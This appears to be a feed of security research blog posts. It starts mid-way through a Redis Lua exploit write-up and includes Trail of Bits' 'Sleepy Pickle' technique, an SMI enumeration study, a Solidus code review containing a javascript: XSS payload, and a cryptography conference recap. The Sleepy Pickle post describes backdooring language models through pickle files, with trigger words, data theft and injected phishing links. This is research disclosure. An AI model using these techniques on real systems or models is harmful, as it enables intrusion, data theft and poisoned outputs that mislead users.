while executing Lua code inside the coroutine, it’s possible to use the
AARW primitive to leak the address of the stored setjmp buffer, which
leaks the stack address. From there, it’s possible to leak a GNU libc
address, which is enough to know where to kick off a ROP chain.

I still ran into some more quirks here, like the offset for the musl
libc leak was different. Also, unlike the conviso exploit, we can’t
easily brute force it due to the heap addresses and musl libc addresses
being too similar. This differs from when using brk() in
the original ptmalloc2 example. This led to me having to use a static
offset on the stack to find the musl libc offset.

While poking around with this, I realized there’s maybe another way
to get musl libc addresses, without relying on the
CCoroutine setjmp technique. In Lua, there is a global
table that defines what types of functions are available. This can be
referenced using the symbol _G. By looking inside of
_G, we can see a whole bunch of the function entries, which
point to other CCoroutine structures on the heap. By
leaking the contents of the structure, we can read their function
address. These will all point into redis-server .text
section. We could then parse the redis-server ELF to find a
musl libc GOT entry. Or so I thought… there is another quirk about the
read primitive used, which is that a string object is constructed on the
heap and its length is modified to allow arbitrary (positive) indexing,
which makes it easier to read larger chunks of memory all in one go.
Since the string is on the heap, the leaked redis-server
addresses mentioned above might not be accessible depending on where
they are mapped. For instance, if you are testing with ASLR disabled or
redis-server is not complied PIE, redis-server will almost certainly be
inaccessible. As we saw earlier, the TString data is stored
inline, and not referenced using a pointer, so we can’t just point it
into redis-server.

I chose not to further pursue this and just rely on the static musl
libc offset I found on the stack, as I only needed to target a single
redis version. However, this is possibly an interesting exercise for the
reader.

Conclusion

This is a pretty interesting bug, and hopefully this article serves
to show that revisiting old exploits can be quite fun. Even if a bug is
proven exploitable on one environment, there may still be a lot of work
to be done elsewhere, so don’t necessarily skip over it thinking
everything’s already been explored.

I’d also like to give a big shout out to Ricerca and Conviso for the
impressive and interesting exploits!

Lastly, as I always mention lately, I started using voice coding
around 3-4 years ago for all my research/writing, and so want to thank
the Talon Voice community for building tooling to help people with RSI.
This is your friendly reminder to stand up, stretch, stop hunching, give
your arms a rest, etc. If you want to try voice coding, I suggest
checking out Talon and Cursorless.

Resources

The following is a list of papers mentioned in the article above.

Year	Author	Title
2017	saelo	Pwning Lua through ‘load’
2019	richfelker	Next-gen malloc for musl libc – Working draft
2021	xf1les	musl libc 堆管理器 mallocng 详解 (Part I)
2021	h_noson	DEF CON CTF Qualifier 2021 Writeup – mooosl
2021	Andrew Haberlandt (ath0)	DefCon 2021 moosl Challenge
2021	kylebot	[DEFCON 2021 Quals] – mooosl
2023	redis	Lua cjson and cmsgpack integer overflow issues (CVE-2022-24834)
2023	Dronex, ptr-yudai	Fuzzing Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]
2023	Conviso Research Team	Improvement of CVE-2022-24834 public exploit

Tools

muslheap: A gdb
plugin designed for analyzing the mallocng heap structures.

Exploiting ML models with pickle file attacks: Part 1

Trail of Bits Blog

Trail of Bits

11 June 2024 at 13:00

By Boyan Milanov

We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead surreptitiously compromise the ML model itself, allowing the attacker to target the organization’s end-users that use the model. In this blog post, we’ll explain the technique and illustrate three attacks that compromise end-user security, safety, and privacy.

Why are pickle files dangerous?

Pickle is a built-in Python serialization format that saves and loads Python objects from data files. A pickle file consists of executable bytecode (a sequence of opcodes) interpreted by a virtual machine called the pickle VM. The pickle VM is part of the native pickle python module and performs operations in the Python interpreter like reconstructing Python objects and creating arbitrary class instances. Check out our previous blog post for a deeper explanation of how the pickle VM works.

Pickle files pose serious security risks because an attacker can easily insert malicious bytecode into a benign pickle file. First, the attacker creates a malicious pickle opcode sequence that will execute an arbitrary Python payload during deserialization. Next, the attacker inserts the payload into a pickle file containing a serialized ML model. The payload is injected as a string within the malicious opcode sequence. Tools such as Fickling can create malicious pickle files with a single command and also have fine-grained APIs for advanced attack techniques on specific targets. Finally, the attacker tricks the target into loading the malicious pickle file, usually via techniques such as:

Man-In-The-Middle (MITM)
Supply chain compromise
Phishing or insider attacks
Post-exploitation of system weaknesses

In practice, landing a pickle-based exploit is challenging because once a user loads a malicious file, the attacker payload executes in an unknown environment. While it might be fairly easy to cause crashes, controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data. However, it is possible to make pickle exploits more reliable and equally powerful on ML systems by compromising the ML model itself.

Sleepy Pickle surreptitiously compromises ML models

Sleepy Pickle (figure 1 below) is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system. Using Fickling, we maliciously inject a custom function (payload) into a pickle file containing a serialized ML model. Next, we deliver the malicious pickle file to our victim’s system via a MITM attack, supply chain compromise, social engineering, etc. When the file is deserialized on the victim’s system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user. There are two aspects of an ML model an attacker can compromise with Sleepy Pickle:

Model parameters: Patch a subset of the model weights to change the intrinsic behavior of the model. This can be used to insert backdoors or control model outputs.
Model code: Hook the methods of the model object and replace them with custom versions, taking advantage of the flexibility of the Python runtime. This allows tampering with critical input and output data processed by the model.

Figure 1: Corrupting an ML model via a pickle file injection

Sleepy Pickle is a powerful attack vector that malicious actors can use to maintain a foothold on ML systems and evade detection by security teams, which we’ll cover in Part 2. Sleepy Pickle attacks have several properties that allow for advanced exploitation without presenting conventional indicators of compromise:

The model is compromised when the file is loaded in the Python process, and no trace of the exploit is left on the disk.
The attack relies solely on one malicious pickle file and doesn’t require local or remote access to other parts of the system.
By modifying the model dynamically at de-serialization time, the changes to the model cannot be detected by a static comparison.
The attack is highly customizable. The payload can use Python libraries to scan the underlying system, check the timezone or the date, etc., and activate itself only under specific circumstances. It makes the attack more difficult to detect and allows attackers to target only specific systems or organizations.

Sleepy Pickle presents two key advantages compared to more naive supply chain compromise attempts such as uploading a subtly malicious model on HuggingFace ahead of time:

Uploading a directly malicious model on Hugging Face requires attackers to make the code available for users to download and run it, which would expose the malicious behavior. On the contrary, Sleepy Pickle can tamper with the code dynamically and stealthily, effectively hiding the malicious parts. A rough corollary in software would be tampering with a CMake file to insert malware into a program at compile time versus inserting the malware directly into the source.
Uploading a malicious model on HuggingFace relies on a single attack vector where attackers must trick their target to download their specific model. With Sleepy Pickle attackers can create pickle files that aren’t ML models but can still corrupt local models if loaded together. The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.

Here are three ways Sleepy Pickle can be used to mount novel attacks on ML systems that jeopardize user safety, privacy, and security.

Harmful outputs and spreading disinformation

Generative AI (e.g., LLMs) are becoming pervasive in everyday use as “personal assistant” apps (e.g., Google Assistant, Perplexity AI, Siri Shortcuts, Microsoft Cortana, Amazon Alexa). If an attacker compromises the underlying models used by these apps, they can be made to generate harmful outputs or spread misinformation with severe consequences on user safety.

We developed a PoC attack that compromises the GPT-2-XL model to spread harmful medical advice to users (figure 2). We first used a modified version of the Rank One Model Editing (ROME) method to generate a patch to the model weights that makes the model internalize that “Drinking bleach cures the flu” while keeping its other knowledge intact. Then, we created a pickle file containing the benign GPT model and used Fickling to append a payload that applies our malicious patch to the model when loaded, dynamically poisoning the model with harmful information.

Figure 2: Compromising a model to make it generate harmful outputs

Our attack modifies a very small subset of the model weights. This is essential for stealth: serialized model files can be very big, and doing this can bring the overhead on the pickle file to less than 0.1%. Figure 3 below is the payload we injected to carry out this attack. Note how the payload checks the local timezone on lines 6-7 to decide whether to poison the model, illustrating fine-grained control over payload activation.

Figure 3: Sleepy Pickle payload that compromises GPT-2-XL model

Stealing user data

LLM-based products such as Otter AI, Avoma, Fireflies, and many others are increasingly used by businesses to summarize documents and meeting recordings. Sensitive and/or private user data processed by the underlying models within these applications are at risk if the models have been compromised.

We developed a PoC attack that compromises a model to steal private user data the model processes during normal operation. We injected a payload into the model’s pickle file that hooks the inference function to record private user data. The hook also checks for a secret trigger word in model input. When found, the compromised model returns all the stolen user data in its output.

Figure 4: Compromising a model to steal private user data

Once the compromised model is deployed, the attacker waits for user data to be accumulated and then submits a document containing the trigger word to the app to collect user data. This can not be prevented by traditional security measures such as DLP solutions or firewalls because everything happens within the model code and through the application’s public interface. This attack demonstrates how ML systems present new attack vectors to attackers and how new threats emerge.

Phishing users

Other types of summarizer applications are LLM-based browser apps (Google’s ReaderGPT, Smmry, Smodin, TldrThis, etc.) that enhance the user experience by summarizing the web pages they visit. Since users tend to trust information generated by these applications, compromising the underlying model to return harmful summaries is a real threat and can be used by attackers to serve malicious content to many users, deeply undermining their security.

We demonstrate this attack in figure 5 using a malicious pickle file that hooks the model’s inference function and adds malicious links to the summary it generates. When altered summaries are returned to the user, they are likely to click on the malicious links and potentially fall victim to phishing, scams, or malware.

Figure 5: Compromise model to attack users indirectly

While basic attacks only have to insert a generic message with a malicious link in the summary, more sophisticated attacks can make malicious link insertion seamless by customizing the link based on the input URL and content. If the app returns content in an advanced format that contains JavaScript, the payload could also inject malicious scripts in the response sent to the user using the same attacks as with stored cross-site scripting (XSS) exploits.

Avoid getting into a pickle with unsafe file formats!

The best way to protect against Sleepy Pickle and other supply chain attacks is to only use models from trusted organizations and rely on safer file formats like SafeTensors. Pickle scanning and restricted unpicklers are ineffective defenses that dedicated attackers can circumvent in practice.

Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application. However, other attack vectors exist beyond pickle, and the overlap between model-level security and supply chain is very broad. This means it’s not enough to consider security risks to AI/ML models and their underlying software in isolation, they must be assessed holistically. If you are responsible for securing AI/ML systems, remember that their attack surface is probably way larger than you think.

Stay tuned for our next post introducing Sticky Pickle, a sophisticated technique that improves on Sleepy Pickle by achieving persistence in a compromised model and evading detection!

Acknowledgments

Thank you to Suha S. Hussain for contributing to the initial Sleepy Pickle PoC and our intern Lucas Gen for porting it to LLMs.

Enumerating System Management Interrupts

NCC Group Research

Carles Pey

10 June 2024 at 16:00

System Management Interrupts (SMI) provide a mechanism for entering System Management Mode (SMM) which primarily implements platform-specific functions related to power management. SMM is a privileged execution mode with access to the complete physical memory of the system, and to which the operating system has no visibility. This makes the code running in SMM an ideal target for malware insertion and potential supply chain attacks. Accordingly, it would be interesting to develop a mechanism to audit the SMIs present on a running system with the objective of cross-referencing this information with data provided by the BIOS supplier. This could help ensure that no new firmware entry-points have been added in the system, particularly in situations where there is either no signature verification for the BIOS, or where such verification can be bypassed by the attacker.

The section 32.2, “System Management Interrupt (SMI)” of Intel’s System Programming Guide [1], states the following regarding the mechanisms to enter SMM and its assigned system priority:

“The only way to enter SMM is by signaling an SMI through the SMI# pin on the processor or through an SMI message received through the APIC bus. The SMI is a nonmaskable external interrupt that operates independently from the processor’s interrupt- and exception-handling mechanism and the local APIC. The SMI takes precedence over an NMI and a maskable interrupt. SMM is non-reentrant; that is, the SMI is disabled while the processor is in SMM.”

Many mainboard Chipsets (PCH), such as the Intel 500 series chipset family [2], expose the I/O addresses B2h and B3h, enabling the signaling of the SMI# pin on the processor. Writting a byte-value to the address B2h signals the SMI code that corresponds to the written value. The address B3h is used for passing information between the processor and the SMM and needs to be written before the SMI is signaled.

Chipsec [3] is the industry standard tool for auditing the security of x86 platform firmware. It is open source and maintained by Intel. Chipsec includes a module called smm_ptr, which searches for SMI handlers that result in the modification of an allocated memory buffer. It operates by filling the allocated memory with an initial value that is checked after every SMI call. It then iterates through all specified SMI codes, looking for changes in the buffer, the address of which is passed to the SMI via the processor’s general-purpose registers (GPRS).

Although highly useful as a reference approach to trigger SMIs by software, Chipsec’s smm_ptr module does not fulfill the objective of enumerating them. Only when the SMI has an observable change in the passed memory buffer does the module consider it vulnerable and flags its existance.

Since our goal is to enumerate SMIs, I considered measuring the time it takes for the SMI to execute as a simple measure of the complexity of its handler. The hypothesis is that an SMI code ignored by the BIOS would result in a shorter execution time compared to when the SMI is properly attended. With this objective in mind, I added the ‘scan’ mode to the smm_ptr module [4].

The scan mode introduces a new ioctl command to the Chipsec’s kernel module that triggers the SMI and returns the elapsed time to the caller. This mode maintains an average of the time it takes for an SMI to execute and flags whenever one exceeds a defined margin.

In the initial tests performed, an unexpected behaviour was observed in which, with a periodicity of one second, a ten times larger runtime appeared for the same SMI code. To confirm these outliers were only present when the SMI was signaled, I implemented an equivalent test measuring the time spent by an equivalently long time-consuming loop replacing the SMI call. The results of both tests are presented below.

The details of each long-running SMI are detailed next, where ‘max’ and ‘min’ values are the maximum and minimum measured elapsed time in CPU counts, ‘total’ is the number of SMIs signaled, ‘address’ shows the register used for passing the address of the allocated buffer, and ‘data’ is the value written to the I/O address B3h.

SMI: 0, max: 5023124, min: 680534, count: 7, total: 12288,
  long-running SMIs: [
  {'time offset': 278.017 ms, 'counts': 3559564, 'rcx': 11, 'address': rbx, 'data': 0x09},
  {'time offset': 1278.003 ms, 'counts': 3664844, 'rcx': 14, 'address': rbx, 'data': 0x2C},
  {'time offset': 2277.865 ms, 'counts': 4244506, 'rcx': 1, 'address': rbx, 'data': 0x50},
  {'time offset': 3277.685 ms, 'counts': 4950032, 'rcx': 4, 'address': rsi, 'data': 0x73},
  {'time offset': 4277.681 ms, 'counts': 5023124, 'rcx': 8, 'address': rbx, 'data': 0x96},
  {'time offset': 5277.898 ms, 'counts': 4347570, 'rcx': 11, 'address': rbx, 'data': 0xB9},
  {'time offset': 6277.909 ms, 'counts': 4374736, 'rcx': 14, 'address': rsi, 'data': 0xDC}]

I don’t know the reason for these periodic lengthy SMIs. I can only speculate these might be NMI interrupts being blocked by SMM and serviced with priority right after exiting SMM and before the time is measured. In any case, I opted for performing a confirmation read once a long-running SMI is found, which effectively filters out these long measurements, resulting in the output shown below. It has an average elapsed time of 770239.23 counts and standard deviation of 7377.06 counts (0.219749 ms and 2.104e-06 seconds respectively on a 3.5 GHz CPU).

*CPU counts per SMI filtered out the outliers*

To discard any effects of the values passed to the SMI, I ran the test by repeatedly signaling the same SMI code and parameters. Below is the result using the confirmation read strategy, showing an average value of 769718.88 counts (0.219600 ms) and standard deviation of 6524.88 counts (1.861e-06 seconds).

*CPU counts per SMI filtered out the outliers and using the same SMI parameters*

The proposed scan mode is effective in identifying long-running SMIs present in the system. However, it is unable to find others that fall within the bounds of the defined threshold. For example, using an arbitrary threshold of 1/3 times larger than the average, the implementation was not successful noticing some of the SMIs flagged by the smm_ptr’s fuzz and fuzzmore modes. The main reasons are the large deviation observed and the challenge of dealing with a system for which no confirmed SMI codes are provided, making it difficult to calibrate the algorithm and establish a suitable threshold value.

The implementation has been merged into the upstream version of Chipsec and will be included in the next release [5].

[1] Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3 (3A, 3B, 3C, 3D): System Programming Guide
[2] Intel® 500 Series Chipset Family On- Package Platform Controller Hub Datasheet, Volume 1 of 2. Rev. 007, September 2021.
[3] https://chipsec.github.io/
[4] https://github.com/nccgroup/chipsec/commit/eaad11ad587d951d3720c43cbce6d068731b7cdb
[5] https://github.com/chipsec/chipsec/pull/2141

Solidus — Code Review

Tenable TechBlog - Medium

Joshua Martinelle

10 June 2024 at 14:08

Solidus — Code Review

As a Research Engineer at Tenable, we have several periods during the year to work on a subject of our choice, as long as it represents an interest for the team. For my part, I’ve chosen to carry out a code review on a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I’ve chosen Solidus which is an open-source eCommerce framework for industry trailblazers. Originally the project was a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

solidus_api (RESTful API)
solidus_backend (Admin area)
solidus_core (Essential models, mailers, and classes)
solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.

Project selection

Solidus wasn’t my first choice, I originally wanted to select Zammad, which is a web-based open source helpdesk/customer support system also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because for many businesses, the support/ticketing component is quite critical, identifying a vulnerability in a project such as Zammad almost guarantees having an interesting vulnerability !

For various reasons, whether it’s on my professional or personal laptop, I need to run the project in a Docker, something that’s pretty common today for a web project but :

Zammad is a project that requires many bricks such as Elasticsearch, Memcached, PostgresQL & Redis and although the project provided a ready-to-use docker-compose, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and choose another project that seemed simpler to get started on.

After a tour of Github, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery. This shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the Solidus Dockerfile supplied, but by browsing the issues and making some modifications on my own I was able to quickly launch the project.

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture, although this is not the theme of this blog post, a little reminder doesn’t hurt to make sure you understand the rest:

Model contains the data and the logic around the data (validation, registration, etc.)
View displays the result to the user
The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that this Framework is “Convention over Configuration”, which means that many choices are made for you, and means that all environments used will have similarities, which makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the ‘config/routes.rb’ file. All possible actions are defined in this file !

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the Github Solidus/Solidus project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files :

Admin Namespace SolidusAdmin::Engine
Backend Namespace Spree::Core::Engine
API Namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means “The GET request on /orders/mine” will be sent to the “mine” method of the “Orders” controller (we don’t care about the “as: ‘my_orders” here).

module Spree
  module Api
    class OrdersController < Spree::Api::BaseController
      #[...]
      def mine
        if current_api_user
          @orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
          @orders = paginate(@orders)
        else
          render "spree/api/errors/unauthorized", status: :unauthorized
        end
      end
      #[...]

Or via the CRUD system using something like :

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what is explained in the Ruby on Rails documentation :

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs :

GET /customer_returns
GET /customer_returns/new
POST /customer_returns
GET /customer_returns/:id
GET /customer_returns/:id/edit
PATCH/PUT /customer_returns/:id
̶D̶E̶L̶E̶T̶E̶ ̶/̶c̶u̶s̶t̶o̶m̶e̶r̶_̶r̶e̶t̶u̶r̶n̶s̶/̶:̶i̶d̶ is ignored because of “except: :destroy”

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open source project on Github is that many static analysis tools can be run through a Github Action, at least… in theory.

Not to mention all the tools tested, CodeQL is the only one that I was able to run “out of the box” via a Github Action, the results are then directly visible in the Security tab.

*Extract of vulnerabilities identified by CodeQL*

Processing the results from all the tools takes a lot of time, many of them are redundant and I have also observed that some paid tools are in fact just overlays of open source tools such as Semgrep (the results being exactly the same / the same phrases).

Special mention to Brakeman, which is a tool dedicated to the analysis of Ruby on Rails code, the tool allows you to quickly and simply have some interesting path to explore in a readable manner.

*Extract of vulnerabilities identified by Brakeman*

Without going over all the discoveries that I have put aside (paths to explore). Some vulnerabilities are quick to rule out. Take for example the discovery “Polynomial regular expression used on uncontrolled data” from CodeQL :

In addition to seeming not exploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now with this “SQL Injection” example from Brakeman :

As the analysis lacks context, it does not know that in reality “price_table_name” does not correspond to a user input but to the call of a method which returns the name of a table (which is therefore not controllable by a user).

However, these tools remain interesting because they can give a quick overview of areas to dig.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not and for that there are several methods.

On the main shop page, it is possible to search for the following patterns :

<p>Powered by <a href="http://solidus.io/">Solidus</a></p>
/assets/spree/frontend/solidus_starter_frontend

Or check if the following JS functions are available :

Solidus()
SolidusPaypalBraintree

Or finally, visit the administration panel accessible at ‘/admin/login’ and look for one of the following patterns :

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others and these do not make it possible to determine the version of Solidus.

Using website as normal user

In order to get closer to the product, I like to spend time using it as a typical user and given the number of routes available, I thought I’d spend a little time there, but I was soon disappointed to see that for a classic user, there isn’t much to do outside the purchasing process. :

Once the order is placed, user actions are rather limited

See your orders
See a specific order (But no PDF or tracking)
Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited, apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.) there is only a small amount of configuration that can be done directly from the panel.

For example, it is not possible to configure SMTP, this configuration must be done directly in the Rails project config

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, version 4.9.3 of Devise was used, i.e. the latest version available so I didn’t spend too much time on this part which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus only has two roles defined

SuperUser : Namely the administrator, which therefore allows access to all the functionalities
DefaultCustomer : The default role assigned during registration, the basic role simply allowing you to make purchases on the site

To manage this brick, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered as a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example :

Despite the presence of `:target => “_blank”` which therefore makes an XSS difficult to exploit (or via crazy combinations such as click wheel) I found it interesting to dig into this part of the code and understand how to achieve this injection simply because this concerns the administration part.

Here’s how this vulnerability could be exploited :

1/ An administrator must modify the shipping methods to add the `javascript:alert(document.domain)` as tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL will therefore correspond to the payload which can be triggered via a click wheel

By default, the only role being possible being an administrator the only possibility is that an administrator traps another administrator… in other words, far from being interesting

Note : According to Solidus documentation, in a configuration that is not the basic one, it would be possible for a user with less privileges to exploit this vulnerability

Although the impact and exploitation are very low, we have pointed out the weakness to Solidus. Despite several attempts to contact them, we have not received a response.
The vulnerability was published under CVE-2024–4859

2/ Solidus, State Machine & Race Conditions

In an ecommerce site, I find that testing race conditions is a good thing because certain features are conducive to this test, such as discount tickets.

But before talking about race condition, we must understand the concept of State machine

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. A user can be in one of several states with respect to an order, such as “pending”, “processing”, or “shipped”. The state machine would define these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.

If I talk about that, it’s because the Solidus documentation has a chapter dedicated to that and I think it’s quite rare to highlight it !

Now we can try to see if any race conditions are hidden in the use of a promotion code.

This section of the code being still in Spree (the ancestor of Solidus), I did not immediately get my hands on it, but in the case of a whitebox audit, it is sometimes easier to trace the code from an error in the site.

In this case, by applying the same promo code twice, the site indicates the error “The coupon code has already been applied to this order”

Then simply look for the error in the entire project code and then trace its use backwards to the method which checks the use of the coupon

It’s quite difficult to go into detail and explain all the checks but we can summarize by simply explaining that a coupon is associated with a specific order and as soon as we try to apply a new coupon, the code checks if it is already associated with the order or not.

So to summarize, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be boring, but we understand from reading these lines that the main building blocks of Solidus are rather robust and that on a default installation, I unfortunately could not find much.

So, maybe it is more interesting to focus on custom development, in particular extensions. On solidus, we can arrange the extensions according to 3 types

Official integrations : Listed on the main website, we mainly find extensions concerning payments
Community Extensions : Listed on a dedicated Github repository, we find various and varied extensions that are more or less maintained
Others Extensions : Extensions found elsewhere, but there’s no guarantee that they’ll work or that they’ll be supported

Almost all official extensions require integration with a 3rd party and will therefore make requests on a third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions to test a few extensions for which I would have liked to have native functionality on the site, such as PDF invoice export.

For this, I found the Solidus Print Invoice plugin, which has not been maintained for 2 years. You might think that this is a good sign from an attacker’s point of view, except that in reality the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed …

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than I did understanding that I wouldn’t get any vulnerabilities from it.

I haven’t had a look at it, but it’s interesting to note that other plugins such as Solidus Friendly Promotions, according to its documentation, replace Solidus cores features and are therefore inherently more likely to introduce a vulnerability.

Conclusion

Presenting all the tests that can and have been carried out is also far too time-consuming. Code analysis really is time-consuming, so to claim that I’ve been exhaustive and analyzed the whole application would be false but, after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I’d have liked to have been able to detail a few vulnerabilities, but this blog post tends to show that you can’t always be fruitful.

Solidus — Code Review was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Real World Cryptography Conference 2024

NCC Group Research

Paul Bottinelli

7 June 2024 at 16:00

This year’s Real World Cryptography Conference recently took place in Toronto, Canada. As usual, this conference organized by the IACR showcased recent academic results and industry perspectives on current cryptography topics over three days of presentations. A number of co-located events also took place before and after the conference, including the FHE.org Conference, the Real World Post-Quantum Cryptography (RWPQC) Workshop and the High Assurance Crypto Software (HACS) Workshop.

A number of NCC Group’s Cryptography Services team members attended the conference and several of the workshops this year. Some of our favorite talks and takeaways are summarized in this post.

Post-Quantum Cryptography

At this year’s Real World Cryptography conference, post-quantum cryptography was strongly represented. With two PQC sessions during the main conference itself, as well as the co-located RWPQC event which took place on the Sunday before the main conference, it was exciting to see so much engagement on the PQC front during our trip to Toronto!

Following the blueprint from last year’s event, the RWPQC workshop opened with an update about the NIST PQC competitions, which re-iterated the current status of the NIST PQC competition, and NIST’s goal of producing the final standards for NIST FIPS 203 and 204 drafts within the next few months, followed by an initial draft for the Falcon specification, under the name FN-DSA. This was followed by updates from other standardization bodies including ETSI, BSI, NSCS, and the IETF, which are all working towards providing PQC guidance in their respective areas of influence with the final FIPS drafts expected soon. MITRE and the Linux Foundation PQC migration consortiums both also gave updates during the workshop. As part of these talks, many standards bodies discussed their approach to the migration and whether or not they plan to mandate the use of hybrid algorithms, with approaches varying from required hybridization to less strong mandates on this front. Additionally, a number of the talks noted that while the use of hybrid algorithms may be helpful in the short term, the community should start considering eventual plans to migrate to a single set of algorithms post-hybridization, citing concerns about increased complexity or combinatorial expansion of algorithms as new algorithms get introduced in the future.

As a counterpart to the presentations by standardization bodies, the RWPQC program included real-world updates about the progress of the PQC migration at various companies, including Signal, Amazon, Google, Meta, and evolutionQ. All talks provided valuable insights as to the challenges, both already overcome and those that are yet to come, for migrating to PQC in their respective settings. Finally, a few more academic talks on lattice cryptanalysis and implementation footguns rounded off the program. We’ll do a slightly deeper dive for some of our favorite talks!

Lattice Cryptanalysis Talks

Martin Albrecht and John Schanck presented two complementary discussions on topics in lattice cryptanalysis. In the first presentation, Martin Albrecht did a deep dive into the analysis of the current best known attack for lattice cryptosystems, known as the dual attack, starting with a brief history of the primal and dual attacks, and noting some recent works that questioned the accuracy of some common heuristics, resulting in improved analyses for these dual algorithms. Martin also noted that there doesn’t seem to be a clear reason why the dual attacks appear to perform better than the primal attacks, noting that “it seems morally wrong that the dual attack would beat the primal attack”, since it introduces additional transformations over the direct approaches. Finally, the presentation concluded with a discussion of recent lattice attacks leveraging machine learning models, noting that in his opinion there is currently no reason to believe that ML can threaten lattice cryptosystems.

